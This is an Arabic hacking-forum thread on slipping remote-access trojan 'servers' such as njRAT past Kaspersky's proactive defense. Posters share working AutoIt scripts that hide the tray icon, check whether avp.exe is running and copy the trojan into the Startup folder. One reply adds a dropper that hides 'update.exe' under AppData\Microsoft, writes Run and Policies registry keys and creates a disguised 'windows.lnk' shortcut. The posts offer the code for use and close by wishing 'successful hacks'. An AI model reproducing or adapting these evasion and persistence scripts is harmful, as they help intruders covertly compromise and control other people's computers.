تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

الباتش النّائم · منذ /02-22-2013, 01:29 PM

"أدخلـ, للتّطوير", للكاسبر, الدّفاع, الإستباقي, تخطّي

تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

السّلام عليكم

جمعة مباركة نتمنّاها للجميع

الموضوع طرح أكثر من مرّة و جرّبت حلولا عديدة لكن للأسف أخفقت معها

راجعت بعض الأسطوانات عندي للغة AutoiT فوجدتــ أحدها يتكلّم عن العبارة الشّرطيّة if

قلت لما لا أطبّقها و أرى النّتيجة يعني " إن .....فـ"

مبدأ الفكرة:

هو أن جميع برامج البدأ تشتغل قبل الكاسبر ، يعني قبل هو ما يتحرّك يكون السّيرفر قد

ثبّت و لا مجال لمراقبته

سلبيّاتها:

لازم الشّخص المستهدف يعمل روستارت للجهاز ( يعني راح يعمل روستارت يعمل)

المتطلّبات:

*1 سيرفر كلين من الكاسبر لأيّ برنامج إختراقـ

*2 إعداداتك كاملة ( تثبيت في الرّيجيستري، مع التّشغيل و و و ....)

*3 برنامج الـ AutoiT (موجود في الموقع الرّسمي )

و لنبدأ على بركة الله بشرح الـ script المراد كتابته :

*1 نضع الشّرط : إن كان الكاسبر شغّالـ

*2 جواب الشّرط: السّيرفر لا يشتغل بل ينسخ نفسه في StartUp

يعني بمجرّد ما يشتغل الكمبيوتر يستغل السّيرفر

*3 إن كان العكس يشتغل السّيرفر مباشرة ( إضافةفقط)

الكود جاهز و قابل للإضافات

كود:

#NoTrayIcon
Opt("TrayIconHide", 1)
if ProcessExists("avp.exe") Then
FileCopy("server.exe",@startupDir)
Else
Run("server.exe")
EndIf

للعلم فقد تمّ تجربته قبل وضع هنا على Njrat و السّلام عليكم

المصدر: development-point - للمزيد تابع : قسم إختراق الأجـهـزه والأيـمـيـلات

jo'~d hg]~thu hgYsjfhrd gg;hsfv "H]ogJ ggj~',dv"

EDZw4sS!m · منذ /02-22-2013, 02:58 PM

مشكور يعطيك العافية
جاري الجربة

MR:HACK · منذ /02-22-2013, 04:25 PM

مــشـــــكور اخي

بارك الله فيك

لكن استفسار بعد اذنك

ممكن ان اضع اكثر من بروسيس حماية في السكريبت

يعني

اضع الـ ( كاسبر ) + ( افيرا ) + ( افاست ) ++ الـــخ

منتظرك

ThE CrEzY · منذ /02-22-2013, 05:54 PM


	المشاركة الأصلية كتبت بواسطة mr:hack


	مــشـــــكور اخي بارك الله فيك لكن استفسار بعد اذنك ممكن ان اضع اكثر من بروسيس حماية في السكريبت يعني اضع الـ ( كاسبر ) + ( افيرا ) + ( افاست ) ++ الـــخ منتظرك

نعم فالامر سهل

كل ما عليك ان تضيف جملة شرطية و تضع ما سيتم العمل داخل الجملة

بالتوفيق

MR:HACK · منذ /02-22-2013, 06:07 PM


	المشاركة الأصلية كتبت بواسطة the crezy


	نعم فالامر سهل كل ما عليك ان تضيف جملة شرطية و تضع ما سيتم العمل داخل الجملة بالتوفيق

طيب , ممكن اسماء البروسيس

لجميع انواع الحمايات ( التي لها دفاعات استباقية )

منتظرك

ThE CrEzY · منذ /02-22-2013, 06:18 PM


	المشاركة الأصلية كتبت بواسطة MR:HACK


	طيب , ممكن اسماء البروسيس لجميع انواع الحمايات ( التي لها دفاعات استباقية ) منتظرك

لا اعرفها اخي للاسف ( يمكنك البحث في قوقل )

الباتش النّائم · منذ /02-23-2013, 02:09 PM

MR:HACK
---------

أيّ لغة هي ترجمة لشيئ تريده أنتـ و هنا تودّ تخطّي باقي الحمايات

بما أنّنا نعرف إسم الـ process للكاسبر الذي هو avp.exe

سنعيد كتابة السّكريب بتغيير بسيط

*1 إذا كان الكاسبر شغّالــ

كود:

If ProcessExists("avp.exe")

إذا then

قم بنسخ ملفّ السيرفر في قائمة بداية التّشغيلـ

كود:

FileCopy("server.exe",@StartupCommonDir)

*2 العكس else إن لم يكون شغّال يعني لو كانت حماية أخرى غيره

قم بنسخ ملف السّيرفر أيضا في قائمة بداية التّشغيلـ مع الإستبدال إذا كان موجود أصلا

كود:

FileCopy("server.exe",@StartupCommonDir,1)

و الكود ككلّ يصبح

كود:

#NoTrayIcon
Opt("TrayIconHide", 1)
If ProcessExists("avp.exe") Then
	FileCopy("server.exe",@StartupCommonDir)
Else
	FileCopy("server.exe",@StartupCommonDir,1)
EndIf

MR:HACK · منذ /02-24-2013, 02:56 AM


	المشاركة الأصلية كتبت بواسطة الباتش النّائم


	mr:hack --------- أيّ لغة هي ترجمة لشيئ تريده أنتـ و هنا تودّ تخطّي باقي الحمايات بما أنّنا نعرف إسم الـ process للكاسبر الذي هو avp.exe سنعيد كتابة السّكريب بتغيير بسيط 1 إذا كان الكاسبر شغّالــ كود: if processexists("avp.exe") إذا then قم بنسخ ملفّ السيرفر في قائمة بداية التّشغيلـ كود: filecopy("server.exe",@startupcommondir) 2 العكس else إن لم يكون شغّال يعني لو كانت حماية أخرى غيره قم بنسخ ملف السّيرفر أيضا في قائمة بداية التّشغيلـ مع الإستبدال إذا كان موجود أصلا كود: filecopy("server.exe",@startupcommondir,1) و الكود ككلّ يصبح كود: #notrayicon opt("trayiconhide", 1) if processexists("avp.exe") then filecopy("server.exe",@startupcommondir) else filecopy("server.exe",@startupcommondir,1) endif

اخي الكريم

هل هذا الكود يتخطى جميع الدفاعات الاستباقية للحمايات ؟!؟

و

هل يتخطى الفيروال ؟!؟

منتظرك

الباتش النّائم · منذ /02-23-2013, 02:15 PM

هذا كود إضافي من أحد الأصدقاء تستطيع به تشغيلـ سيرفر الـCyber و الـ Xtrem

تقولي لماذا هما فقط أقلّك شرطه:

* لا تفعّل خاصيّة البدأ مع الويندوز Run على البرنامج

* لا تفعّل خاصيّة الحقن

* لا تفعّل خاصيّة التّبيت بالروجيستري

السّكريبت يقوم بذلك المهم السّيرفر يكون كلين

كود:

if Not FileExists(@AppDataDir&"\Microsoft\update.exe") Then
        RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\", "work", "REG_EXPAND_SZ","%APPDATA%\Microsoft\update.exe")
        RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\", "work", "REG_EXPAND_SZ","%APPDATA%\Microsoft\update.exe")
        FileCreateShortcut("%APPDATA%\Microsoft\update.exe", @StartupDir & "\windows.lnk", "%APPDATA%\Microsoft\", "", "windows", @SystemDir & "\shell32.dll", "", "4", @SW_MINIMIZE)
        FileInstall("update.exe",@AppDataDir&"\Microsoft\update.exe",1)
EndIf

update.exe هو إسم سيرفرك و إختراقات موفّقة

Dr..ViRuS · منذ /02-23-2013, 02:24 PM

يعطيكـ العافيه ياغالي يستفيدو منو الشباب وفي كمان شفت شرح

تخطي الدفاع الاستباقي افيرا

موفق يابعدي

أدوات الموضوع
مشاهدة صفحة طباعة الموضوع أرسل هذا الموضوع إلى صديق
انواع عرض الموضوع
الانتقال إلى العرض العادي العرض المتطور الانتقال إلى العرض الشجري

المواضيع المتشابهه للموضوع: تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
[ مشكله ] الدّفاع الإستباقي	الباتش النّائم	مشاكل وحلول إختراق الأجهزة	7	02-20-2013 12:12 AM

الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)

تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

السّلام عليكم جمعة مباركة نتمنّاها للجميع الموضوع طرح أكثر من مرّة و جرّبت حلولا عديدة لكن للأسف أخفقت معها راجعت بعض الأسطوانات عندي للغة